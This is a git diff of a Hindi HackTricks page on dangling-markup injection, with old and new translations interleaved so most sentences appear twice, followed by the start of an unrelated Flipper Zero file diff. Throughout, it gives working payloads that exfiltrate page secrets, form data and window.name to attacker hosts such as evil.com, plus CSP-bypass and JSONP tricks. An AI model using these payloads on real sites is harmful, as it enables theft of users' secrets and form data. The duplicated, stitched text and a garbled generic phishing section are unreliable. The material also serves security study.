* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**.
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.
</details>
## सारांश
यह तकनीक एक **एचटीएमएल इंजेक्शन मिलते ही उपयोग की जा सकती है** जब एक उपयोगकर्ता से जानकारी निकालनी हो। यह बहुत उपयोगी है अगर आपको किसी [**XSS**](../xss-cross-site-scripting/) को एक्सप्लोइट करने का कोई तरीका नहीं मिलता है, लेकिन आप **कुछ एचटीएमएल टैग्स इंजेक्ट** कर सकते हैं।\
यह उपयोगी भी है अगर किसी **गुप्त सामग्री को साफ टेक्स्ट में सहेजा गया है** और आप उसे क्लाइंट से **बाहर निकालना** चाहते हैं, या अगर आप किसी स्क्रिप्ट को गुमराह करना चाहते हैं।
यह तकनीक तब उपयोग की जा सकती है जब **HTML इंजेक्शन पाया जाता है**. यह बहुत उपयोगी है यदि आप **XSS का शोषण करने का कोई तरीका नहीं पाते** लेकिन आप कुछ HTML टैग्स **इंजेक्ट कर सकते हैं**.\
यह तब भी उपयोगी है जब कुछ **सीक्रेट साफ़ टेक्स्ट में सेव किया गया हो** और आप उसे क्लाइंट से **बाहर निकालना** चाहते हों, या यदि आप किसी स्क्रिप्ट निष्पादन को गुमराह करना चाहते हों.
यहां बहुत सारी तकनीकें बात की गई हैं जो कुछ [**सामग्री सुरक्षा नीति**](../content-security-policy-csp-bypass/) को बाईपास करने के लिए उपयोगी हो सकती हैं, अप्रत्याशित तरीकों में जानकारी को बाहर निकालने के लिए (एचटीएमएल टैग्स, सीएसएस, एचटीटीपी-मेटा टैग, फॉर्म, बेस...).
यहां बताई गई कई तकनीकें कुछ [**Content Security Policy**](../content-security-policy-csp-bypass/) को बायपास करने के लिए उपयोग की जा सकती हैं, अप्रत्याशित तरीकों से जानकारी को बाहर निकालने के लिए (html टैग्स, CSS, http-meta टैग्स, फॉर्म्स, बेस...).
## मुख्य अनुप्रयोग
### साफ टेक्स्ट सीक्रेट्स चोरी
### साफ टेक्स्ट सीक्रेट्स चुराना
यदि आप `<img src='http://evil.com/log.cgi?` इंजेक्ट करते हैं तो जब पेज लोड होता है तो पीडीएफ आपको इंजेक्टेड `img` टैग और कोड के बीच के अगले कोड कोट के बीच में सभी कोड को भेजेगा। यदि उस चंक में किसी गुप्त सामग्री को स्थानित किया गया है, तो आप उसे चुरा लेंगे (आप एक डबल कोट का उपयोग करके भी यही काम कर सकते हैं, देखें कौन सा अधिक दिलचस्प हो सकता है)
यदि आप `<img src='http://evil.com/log.cgi?` इंजेक्ट करते हैं जब पेज लोड होता है तो पीड़ित आपको इंजेक्टेड `img` टैग और कोड के अंदर अगले कोट के बीच सभी कोड भेजेगा. यदि कोई सीक्रेट उस चंक में किसी तरह स्थित है, तो आप उसे चुरा लेंगे (आप यही काम डबल कोट का उपयोग करके भी कर सकते हैं, देखें कि कौन सा अधिक दिलचस्प हो सकता है).
यदि `img` टैग मना किया जाता है (उदाहरण के लिए, सीएसपी के कारण) तो आप `<meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?` का उपयोग भी कर सकते हैं
यदि `img` टैग प्रतिबंधित है (CSP के कारण उदाहरण के लिए) तो आप `<meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?` का उपयोग भी कर सकते हैं.
```
<img src='http://attacker.com/log.php?HTML=
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=
<meta http-equiv="refresh" content='0;URL=ftp://evil.com?a=
```
ध्यान दें कि **Chrome "<" या "\n" वाले HTTP URLs को ब्लॉक करता है**, इसलिए आप "ftp" जैसे अन्य प्रोटोकॉल स्कीम का प्रयास कर सकते हैं।
ध्यान दें कि **Chrome HTTP URLs को ब्लॉक करता है** जिसमें "<" या "\n" होता है, इसलिए आप "ftp" जैसी अन्य प्रोटोकॉल स्कीम्स का प्रयास कर सकते हैं।
आप CSS `@import` का दुरुपयोग भी कर सकते हैं (जो एक ";" तक कोड भेजेगा)।
आप CSS `@import` का दुरुपयोग भी कर सकते हैं (यह सभी कोड को तब तक भेजेगा जब तक इसे ";") नहीं मिल जाता)
```markup
<style>@import//hackvertor.co.uk? <--- Injected
<b>steal me!</b>;
```
आप इस्तेमाल कर सकते हैं **`<table`**:
आप **`<table`** का भी उपयोग कर सकते हैं:
```bash
<table background='//your-collaborator-id.burpcollaborator.net?'
```
आप एक `<base` टैग भी सम्मिलित कर सकते हैं। सभी जानकारी उस समय तक भेजी जाएगी जब तक कि उद्धरण बंद नहीं हो जाता है, लेकिन इसके लिए कुछ उपयोगकर्ता संवेदनशीलता की आवश्यकता होती है (उपयोगकर्ता को किसी लिंक पर क्लिक करना होगा, क्योंकि बेस टैग ने लिंक द्वारा निर्देशित डोमेन को बदल दिया होगा):
आप `<base` टैग भी डाल सकते हैं। सभी जानकारी भेजी जाएगी जब तक कि कोट बंद नहीं हो जाता, लेकिन इसके लिए कुछ उपयोगकर्ता संपर्क (user interaction) की आवश्यकता होती है (उपयोगकर्ता को किसी लिंक पर क्लिक करना होगा, क्योंकि base टैग ने लिंक द्वारा इंगित डोमेन को बदल दिया होगा):
```markup
<base target=' <--- Injected
steal me'<b>test</b>
```
### फॉर्म चोरी
#### विवरण
फॉर्म चोरी एक तकनीक है जिसमें हम एक वेब पेज पर मौजूद फॉर्म के डेटा को चोरी करते हैं। यह तकनीक उपयोगकर्ताओं के द्वारा भरे गए व्यक्तिगत और सांख्यिकीय जानकारी को प्राप्त करने का एक अविधि है। इसका उपयोग अधिकांशतः फिशिंग हमलों में किया जाता है, जहां एक हमलावर वेबसाइट बनाई जाती है जो मूल वेबसाइट की तरह दिखती है और उपयोगकर्ताओं को धोखा देकर उनकी जानकारी चुरा लेती है।
#### तकनीक
फॉर्म चोरी के लिए, हम निम्नलिखित कदमों का पालन करते हैं:
1. एक वेब पेज का चयन करें जिसमें फॉर्म होता है जिसका डेटा हम चोरी करना चाहते हैं।
2. वेब पेज के HTML कोड को जांचें और फॉर्म के नाम, इनपुट फ़ील्ड्स और उनके नामों को ध्यान से नोट करें।
3. एक वेब पेज बनाएं और उसे अपनी वेबसाइट पर होस्ट करें।
4. नई वेब पेज में एक फॉर्म बनाएं और उसे मूल वेब पेज के फॉर्म के साथ एकीकृत करें।
5. फॉर्म के इनपुट फ़ील्ड्स को उपयोगकर्ताओं के द्वारा भरे गए डेटा के साथ पूर्ण करें।
6. फॉर्म को अपनी वेबसाइट पर सबमिट करें और उपयोगकर्ताओं को धोखा देंकर उनकी जानकारी चोरी करें।
#### सुरक्षा सुझाव
फॉर्म चोरी से बचने के लिए, निम्नलिखित सुरक्षा सुझावों का पालन करें:
- वेबसाइटों पर HTTPS का उपयोग करें ताकि डेटा एन्क्रिप्टेड हो सके।
- उपयोगकर्ताओं को जागरूक करें कि वे किसी भी वेबसाइट पर अपनी व्यक्तिगत जानकारी को देने से पहले उसकी प्रामाणिकता की जांच करें।
- फॉर्म फ़ील्डों के लिए वैधेयता नियम और इनपुट सत्यापन का उपयोग करें।
- वेबसाइटों को नियमित रूप से सुरक्षा स्कैन करें और सुरक्षा के लिए उन्नत उपाय अपनाएं।
### फॉर्म्स चुराना
```markup
<base href='http://evil.com/'>
```
ो, उन फॉर्म्स को जो डेटा को पथ को भेजते हैं (जैसे `<form action='update_profile.php'>`) वह डेटा खतरनाक डोमेन को भेजेंगे।
तब, जो फॉर्म्स डेटा पथ पर भेजते हैं (जैसे `<form action='update_profile.php'>`) वे डेटा को दुर्भावनापूर्ण डोमेन पर भेज देंगे।
### फॉर्म्स चोरी 2
### फॉर्म्स चुराना 2
एक फॉर्म हेडर सेट करें: `<form action='http://evil.com/log_steal'>` यह अगले फॉर्म हेडर को ओवरराइट करेगा और फॉर्म के सभी डेटा को हमलावर्धक को भेज दिया जाएगा।
एक फॉर्म हेडर सेट करें: `<form action='http://evil.com/log_steal'>` यह अगले फॉर्म हेडर को ओवरराइट कर देगा और फॉर्म से सारा डेटा हमलावर को भेजा जाएगा।
### फॉर्म्स चोरी 3
### फॉर्म्स चुराना 3
बटन फॉर्म की जानकारी को भेजने वाले URL को "formaction" गुणधर्म के साथ बदल सकता है:
बटन उस URL को बदल सकता है जहाँ फॉर्म की जानकारी भेजी जा रही है "formaction" विशेषता के साथ:
```markup
<button name=xss type=submit formaction='https://google.com'>I get consumed!
```
एक हमलावर इसका उपयोग जानकारी चुराने के लिए कर सकता है।
### साफ पाठ रहस्यों की चोरी 2
### स्पष्ट पाठ रहस्यों की चोरी 2
नवीनतम उल्लिखित तकनीक का उपयोग करके फॉर्म चोरी करने के लिए (नए फॉर्म हैडर को इंजेक्ट करना) आप एक नया इनपुट फ़ील्ड इंजेक्ट कर सकते हैं:
फॉर्म्स चुराने के लिए उल्लेखित नवीनतम तकनीक का उपयोग करते हुए (एक नया फॉर्म हेडर इंजेक्ट करना) आप तब एक नया इनपुट फील्ड इंजेक्ट कर सकते हैं:
```markup
<input type='hidden' name='review_body' value="
```
और यह इनपुट फ़ील्ड इसके डबल कोट और HTML में अगले डबल कोट के बीच की सभी सामग्री को समेत करेगा। यह हमला "_**स्पष्ट पाठ रहस्यों की चोरी**_" को "_**फ़ॉर्म2 की चोरी**_" के साथ मिलाता है।
और यह इनपुट फ़ील्ड अपने डबल कोट के बीच की सभी सामग्री को और HTML में अगले डबल कोट तक की सामग्री को समाहित करेगा। यह हमला "_**Stealing clear text secrets**_" और "_**Stealing forms2**_" को मिलाता है।
आप एक ही चीज़ को फ़ॉर्म और `<option>` टैग में इंजेक्ट करके ऐसा ही कर सकते हैं। एक बंद `</option>` मिलने तक सभी डेटा भेजा जाएगा:
आप एक फॉर्म और एक `<option>` टैग इंजेक्ट करके भी यही काम कर सकते हैं। जब तक एक बंद `</option>` नहीं मिल जाता, तब तक सभी डेटा भेजा जाएगा:
```markup
<form action=http://google.com><input type="submit">Click Me</input><select name=xss><option
```
### फॉर्म पैरामीटर इंजेक्शन
आप एक फॉर्म के पथ को बदल सकते हैं और नए मान डाल सकते हैं ताकि एक अप्रत्याशित कार्रवाई की जाएगी:
आप एक फॉर्म का पथ बदल सकते हैं और नए मान डाल सकते हैं ताकि एक अप्रत्याशित क्रिया की जा सके:
```markup
<form action='/change_settings.php'>
<input type='hidden' name='invite_user'
@ -119,30 +97,30 @@ value='fredmbogo'> ← Injected lines
```
### नोस्क्रिप्ट के माध्यम से स्पष्ट पाठ रहस्यों की चोरी
`<noscript></noscript>` एक टैग है जिसकी सामग्री का अर्थानुसार इंटरप्रिटेशन होगा अगर ब्राउज़र जावास्क्रिप्ट का समर्थन नहीं करता है (आप [chrome://settings/content/javascript](chrome://settings/content/javascript) में क्रोम में जावास्क्रिप्ट को सक्षम/अक्षम कर सकते हैं)।
`<noscript></noscript>` एक टैग है जिसकी सामग्री का व्याख्या की जाएगी अगर ब्राउज़र जावास्क्रिप्ट का समर्थन नहीं करता है (आप जावास्क्रिप्ट को Chrome में सक्षम/अक्षम कर सकते हैं [chrome://settings/content/javascript](chrome://settings/content/javascript))।
एक तरीका वेब पृष्ठ की सामग्री को अपराधी नियंत्रित साइट के नियंत्रण में इंजेक्शन के बिंदु से नीचे तक निकालने का होगा। इसके लिए निम्नलिखित को इंजेक्ट करें:
इंजेक्शन के बिंदु से वेब पेज की सामग्री को एक हमलावर नियंत्रित साइट पर निकालने का एक तरीका यह होगा:
```markup
<noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>
```
### उपयोगकर्ता संवाद के साथ सीएसपी को बाईपास करना
### CSP को उपयोगकर्ता संपर्क के साथ बायपास करना
[पोर्टस्विगर्स के अनुसंधान](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup) से आप यह सीख सकते हैं कि **सबसे अधिक सीएसपी प्रतिबंधित** वातावरण से भी आप कुछ **उपयोगकर्ता संवाद** के साथ अभी भी **डेटा निर्यात** कर सकते हैं। इस अवसर में हम निम्नलिखित पेलोड का उपयोग करेंगे:
इस [portswiggers अनुसंधान](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup) से आप सीख सकते हैं कि **सबसे अधिक CSP प्रतिबंधित** वातावरण से भी आप कुछ **उपयोगकर्ता संपर्क** के साथ **डेटा निकालना** संभव है। इस अवसर पर हम पेलोड का उपयोग करेंगे:
```markup
<a href=http://attacker.net/payload.html><font size=100 color=red>You must click me</font></a>
<base target='
```
नोट करें कि आप **पीड़ित** से एक **लिंक पर क्लिक करने** के लिए कहेंगे जो उसे आपके द्वारा नियंत्रित **पेलोड** पर **रीडायरेक्ट** करेगा। इसके अलावा ध्यान दें कि **`base`** टैग के भीतर **`target`** एट्रिब्यूट एकल कोट तक का **HTML सामग्री** शामिल होगा।
इससे यह होगा कि जब लिंक पर क्लिक किया जाता है तो **`window.name`** का **मान** वह सभी **HTML सामग्री** होगा। इसलिए, जैसा कि आप लिंक पर क्लिक करके पहुंच रहे पेज को **नियंत्रित करते हैं**, आप उस **`window.name`** तक पहुंच सकते हैं और उस डेटा को **अपहरण** कर सकते हैं:
ध्यान दें कि आप **पीड़ित** से एक **लिंक पर क्लिक करने** के लिए कहेंगे जो उसे आपके द्वारा नियंत्रित **payload** पर **रीडायरेक्ट** करेगा। यह भी ध्यान दें कि **`base`** टैग के अंदर **`target`** विशेषता अगले एकल उद्धरण तक **HTML सामग्री** रखेगी।\
इससे यह होगा कि अगर लिंक पर क्लिक किया जाता है तो **`window.name`** का **मान** वह सभी **HTML सामग्री** होगा। इसलिए, चूंकि आप उस पेज को नियंत्रित करते हैं जहां पीड़ित लिंक पर क्लिक करके पहुंच रहा है, आप उस **`window.name`** तक पहुंच सकते हैं और उस डेटा को **exfiltrate** कर सकते हैं:
```markup
<script>
if(window.name) {
new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponent(window.name);
</script>
```
### भ्रामक स्क्रिप्ट वर्कफ़्लो 1 - HTML नेमस्पेस हमला
### भ्रामक स्क्रिप्ट वर्कफ्लो 1 - HTML नेमस्पेस अटैक
HTML में एक नया टैग डालें जिसमें एक आईडी होगी और जो अगले टैग को ओवरराइट करेगी और जिसका मान एक स्क्रिप्ट के फ़्लो को प्रभावित करेगा। इस उदाहरण में आप चुन रहे हैं कि जानकारी किसके साथ साझा की जाएगी:
HTML के अंदर एक नया टैग और एक id डालें जो अगले टैग को ओवरराइट करेगा और एक ऐसा मान जो स्क्रिप्ट के प्रवाह को प्रभावित करेगा। इस उदाहरण में आप चुन रहे हैं कि जानकारी किसके साथ साझा की जाएगी:
```markup
<input type='hidden' id='share_with' value='fredmbogo'> ← Injected markup
...
@ -157,9 +135,9 @@ request.share_with = document.getElementById('share_with').value;
...
}
```
### भ्रामक स्क्रिप्ट वर्कफ्लो 2 - स्क्रिप्ट नेमस्पेस हमला
### भ्रामक स्क्रिप्ट वर्कफ्लो 2 - स्क्रिप्ट नेमस्पेस अटैक
HTML टैग्स को सम्मिलित करके जावास्क्रिप्ट नेमस्पेस में चर बनाएं। फिर, यह चर एप्लिकेशन के फ़्लो को प्रभावित करेगा:
जावास्क्रिप्ट नेमस्पेस के अंदर HTML टैग्स डालकर वेरिएबल्स बनाएं। फिर, यह वेरिएबल एप्लिकेशन के प्रवाह को प्रभावित करेगा:
```markup
<img id='is_public'> ← Injected markup
@ -183,7 +161,7 @@ if (is_public) request.access_mode = AM_PUBLIC; ← Condition always e
```
### JSONP का दुरुपयोग
यदि आपको एक JSONP इंटरफेस मिलता है, तो आप विचित्र डेटा के साथ विचित्र फ़ंक्शन को कॉल कर सकते हैं:
यदि आपको JSONP इंटरफ़ेस मिलता है, तो आप मनमाने डेटा के साथ मनमाने फ़ंक्शन को कॉल कर सकते हैं:
```markup
<script src='/editor/sharing.js'>: Legitimate script
function set_sharing(public) {
@ -195,19 +173,19 @@ else request.access_mode = AM_PRIVATE;
<script src='/search?q=a&call=set_sharing'>: Injected JSONP call
set_sharing({ ... })
```
या आप यह भी प्रयास कर सकते हैं कि कुछ जावास्क्रिप्ट को क्रियान्वित करें:
या आप कुछ जावास्क्रिप्ट निष्पादित करने का प्रयास भी कर सकते हैं:
```markup
<script src='/search?q=a&call=alert(1)'></script>
```
### Iframe दुरुपयोग
### Iframe का दुरुपयोग
ध्यान दें कि एक **बाल दस्तावेज़ माता-पिता के लिए स्थान संपत्ति को देख सकता है और सेट कर सकता है, यहां तक कि यदि क्रॉस-संबंधी हो।** इसका मतलब है कि आप एक **आइफ्रेम** के अंदर कोई भी कोड लोड करके क्लाइंट को किसी अन्य पृष्ठ तक पहुंच करा सकते हैं, जैसे:
ध्यान दें कि **एक चाइल्ड डॉक्यूमेंट, क्रॉस-ओरिजिन होने पर भी, पेरेंट के लिए लोकेशन प्रॉपर्टी को देख और सेट कर सकता है।** इसका मतलब है कि आप क्लाइंट को किसी अन्य पेज तक पहुँचा सकते हैं **iframe** के अंदर कुछ कोड लोड करके जैसे:
```markup
<html><head></head><body><script>top.window.location = "https://attacker.com/hacked.html"</script></body></html>
```
इसे इस तरह से न्यूनतम किया जा सकता है: _**sandbox= allow-scripts allow-top-navigation**_
इसे _**sandbox='allow-scripts allow-top-navigation'**_ जैसी चीज़ के साथ कम किया जा सकता है।
एक आईफ्रेम भी इस्तेमाल किया जा सकता है ताकि एक अलग पेज से संवेदनशील जानकारी चुराई जा सके **आईफ्रेम नाम एट्रिब्यूट का उपयोग करके**। इसलिए आप एक ऐसा आईफ्रेम बना सकते हैं जो खुद को आईफ्रेम करता है और एचटीएमएल इंजेक्शन का दुरुपयोग करता है जिससे **संवेदनशील जानकारी आईफ्रेम नाम एट्रिब्यूट के भीतर प्रकट होती है** और फिर प्रारंभिक आईफ्रेम से उसे एक्सेस करके उसे चुरा सकते हैं।
एक iframe का उपयोग करके भी **iframe name attribute का उपयोग करते हुए** एक अलग पेज से संवेदनशील जानकारी को लीक किया जा सकता है। यह इसलिए है क्योंकि आप एक iframe बना सकते हैं जो खुद को iframe करता है HTML इंजेक्शन का दुरुपयोग करते हुए जो **संवेदनशील जानकारी को iframe name attribute के अंदर दिखाता है** और फिर उस नाम को प्रारंभिक iframe से एक्सेस करके उसे लीक कर सकते हैं।
```html
<script>
function cspBypass(win) {
@ -218,67 +196,69 @@ setTimeout(()=>alert(win[0].name), 500);
<iframe src="//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27" onload="cspBypass(this.contentWindow)"></iframe>
```
अधिक जानकारी के लिए [https://portswigger.net/research/bypassing-csp-with-dangling-iframes](https://portswigger.net/research/bypassing-csp-with-dangling-iframes) देखें
अधिक जानकारी के लिए [https://portswigger.net/research/bypassing-csp-with-dangling-iframes](https://portswigger.net/research/bypassing-csp-with-dangling-iframes) देखें
### \<meta दुरुपयोग
### \<meta का दुरुपयोग
आप **`meta http-equiv`** का उपयोग करके कई कार्रवाइयों को कर सकते हैं, जैसे कि कुकी सेट करना: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` या पुनर्निर्देशित करना (इस मामले में 5 सेकंड में): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
आप **`meta http-equiv`** का उपयोग **कई क्रियाओं** के लिए कर सकते हैं जैसे कि Cookie सेट करना: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` या रीडायरेक्ट करना (इस मामले में 5 सेकंड में): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
इसे **CSP** के साथ टाला जा सकता है **http-equiv** के संबंध में (`Content-Security-Policy: default-src 'self';`, या `Content-Security-Policy: http-equiv 'self';`)
इसे **CSP** के साथ **टाला** जा सकता है जो **http-equiv** के बारे में है ( `Content-Security-Policy: default-src 'self';`, या `Content-Security-Policy: http-equiv 'self';`)
### नया \<portal HTML टैग
आप यहां \<portal टैग के उपयोग के द्वारा उत्पन्न होने वाली सुरक्षा संबंधी समस्याओं पर एक बहुत **दिलचस्प शोध** पा सकते हैं [यहां](https://research.securitum.com/security-analysis-of-portal-element/)।\
इस लेख के लेखन के समय में आपको Chrome में `chrome://flags/#enable-portals` पर पोर्टल टैग को सक्षम करना होगा, अन्यथा यह काम नहीं करेगा।
आप \<portal टैग की खोजी गई संभावित कमजोरियों पर एक बहुत **रोचक शोध** [यहाँ](https://research.securitum.com/security-analysis-of-portal-element/) पा सकते हैं।\
इस लेखन के समय आपको Chrome में `chrome://flags/#enable-portals` पर जाकर portal टैग को सक्षम करना होगा नहीं तो यह काम नहीं करेगा।
```markup
<portal src='https://attacker-server?
```
### HTML लीक
### HTML लीक्स
HTML में कनेक्टिविटी लीक करने के सभी तरीके Dangling Markup के लिए उपयोगी नहीं होंगे, लेकिन कभी-कभी यह मदद कर सकता है। इसे यहां देखें: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)
HTML में सभी प्रकार के लीक्स उपयोगी नहीं होते हैं Dangling Markup के लिए, पर कभी-कभी यह मदद कर सकते हैं। इन्हें यहाँ देखें: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)
## SS-लीक
## SS-Leaks
यह **डैंगलिंग मार्कअप और XS-लीक्स** के बीच का **मिश्रण** है। एक ओर यह संकटग्रस्तता को अनुमति देता है कि हम एक **समान मूल** के पृष्ठ में HTML (लेकिन नहीं JS) को **इंजेक्ट** करें। दूसरी ओर हम सीधे वह पृष्ठ नहीं **हमला** करेंगे जहां हम HTML को इंजेक्ट कर सकते हैं, बल्कि **दूसरे पृष्ठ** पर
यह **dangling markup और XS-Leaks के बीच का** **मिश्रण** है। एक ओर यह भेद्यता **HTML इंजेक्ट** करने की अनुमति देती है (पर JS नहीं) उसी पेज पर जिसका हम हमला करेंगे। दूसरी ओर हम सीधे उस पेज पर हमला नहीं करेंगे जहाँ हम HTML इंजेक्ट कर सकते हैं, बल्कि **दूसरे पेज** पर करेंगे
{% content-ref url="ss-leaks.md" %}
[ss-leaks.md](ss-leaks.md)
{% endcontent-ref %}
## XS-सर्च/XS-लीक्स
## XS-Search/XS-Leaks
XS-सर्च क्रॉस-मूल जानकारी को छीनने के लिए **साइड चैनल हमलों** का उपयोग करते हैं। इसलिए, यह Dangling Markup से एक अलग तकनीक है, हालांकि, कुछ तकनीकों में HTML टैगों का उपयोग किया जाता है (JS के साथ और बिना), जैसे [**CSS इंजेक्शन**](../xs-search.md#css-injection) या [**लेजी लोड इमेजेस**](../xs-search.md#image-lazy-loading)**।**
XS-Search **क्रॉस-ओरिजिन जानकारी को निकालने** के लिए ओरिएंटेड हैं, **साइड चैनल हमलों** का दुरुपयोग करके। इसलिए, यह Dangling Markup से अलग तकनीक है, हालांकि, कुछ तकनीकें HTML टैग्स के शामिल करने का दुरुपयोग करती हैं (JS निष्पादन के साथ और बिना), जैसे [**CSS Injection**](../xs-search.md#css-injection) या [**Lazy Load Images**](../xs-search.md#image-lazy-loading)**.**
{% content-ref url="../xs-search.md" %}
[xs-search.md](../xs-search.md)
{% endcontent-ref %}
## ब्रूट-फोर्स डिटेक्शन सूची
## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %}
## संदर्भ
यहां प्रस्तुत की गई सभी तकनीकों और अधिक विवरणों को निम्न लिंकों पर देखा जा सकता है:
यहाँ प्रस्तुत सभी तकनीकें और अधिक विस्तार से देखी जा सकती हैं:
{% embed url="http://lcamtuf.coredump.cx/postxss/" %}
इसके अलावा, इस लिंक पर अधिक जानकारी मिलेगी:
अन्य HTML टैग्स जिनका दुरुपयोग किया जा सकता है, यहाँ पाया जा सकता है:
{% embed url="http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/" %}
अधिक जानकारी:
अधिक जानकारी के लिए:
{% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करना चाहते हैं? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* प्राप्त करें [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**।**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को फॉलो करें।**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का पालन करें**.
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
</details>

54
todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
View file

@ -2,60 +2,62 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>शून्य से नायक तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने** की उपलब्धता चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **हैकिंग ट्रिक्स को शेयर करें और PRs सबमिट करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में।**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
